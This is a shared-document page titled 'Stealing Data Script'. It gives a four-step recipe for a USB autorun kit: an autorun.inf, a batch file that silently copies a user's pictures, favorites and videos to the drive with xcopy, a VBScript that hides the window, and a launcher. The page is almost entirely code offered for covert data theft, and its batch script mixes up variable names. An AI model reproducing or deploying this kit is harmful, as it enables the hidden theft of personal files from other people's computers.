0% found this document useful (0 votes)
14 views1 page

Stealing Data Script

The document provides a step-by-step guide to create an autorun setup for a USB drive. It includes instructions to create an 'autorun.inf' file, a batch file for backing up user files, a VBScript to run the batch file invisibly, and a launch script to execute the VBScript. Each step involves using Notepad to save specific code snippets as different file types.

Uploaded by

boobnoobie83
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
14 views1 page

Stealing Data Script

The document provides a step-by-step guide to create an autorun setup for a USB drive. It includes instructions to create an 'autorun.inf' file, a batch file for backing up user files, a VBScript to run the batch file invisibly, and a launch script to execute the VBScript. Each step involves using Notepad to save specific code snippets as different file types.

Uploaded by

boobnoobie83
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

STEP # 1

Open Notepad (I recommend Notepad++) and copy-paste the following lines.

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

Save this as autorun.inf

STEP # 2

Open Notepad again and copy-paste the following lines

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls

Save this as file.bat

STEP # 3

Open Notepad once again and copy-paste the following line.

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Save this as invisible.vbs

STEP # 4

Open Notepad one last time and copy-paste the following line.

wscript.exe \invisible.vbs file.bat

Save this as launch.bat

You might also like